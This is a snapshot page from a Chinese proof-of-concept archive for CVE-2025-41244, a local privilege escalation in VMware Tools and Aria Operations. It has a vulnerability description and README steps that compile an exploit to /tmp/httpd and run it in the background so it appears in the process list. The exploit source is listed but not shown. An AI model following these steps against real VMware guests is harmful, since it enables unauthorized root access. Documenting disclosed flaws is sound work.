关联漏洞
标题:VMware Tools和VMware Aria Operations 安全漏洞 (CVE-2025-41244)Description:VMware Tools和VMware Aria Operations都是美国威睿(VMware)公司的产品。VMware Tools是一款VMWare虚拟机自带的增强工具,它是VMware提供的用于增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。VMware Aria Operations是一个统一的、人工智能驱动的自动驾驶 IT 运营管理平台,适用于私有云、混合云和多云环境。 VMware Tools和VMware Aria Operations存在安全漏洞,该漏洞源于本地非特权攻击者可利
Description
CVE-2025-41244 is a critical local privilege escalation vulnerability in VMware Aria Operations and VMware Tools
介绍
💻 Step-by-Step Technical Process
Compile the Program
bash
# Compile the C code into an executable
gcc -o /tmp/httpd /tmp/CVE-2025-41244.c
# Make it executable
chmod +x /tmp/httpd
Test the Version Functionality
bash
# Test the -v flag (should print version and exit)
/tmp/httpd -v
# Test the -V flag (should print detailed version and exit)
/tmp/httpd -V
Step 4: Run the Exploit
bash
# Run it in the background so it appears in process list
/tmp/httpd &
文件快照
[4.0K] /data/pocs/69721b531e4d24d1a28e13416e6686977974e01f
├── [ 762] CVE-2025-41244.c
└── [ 460] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。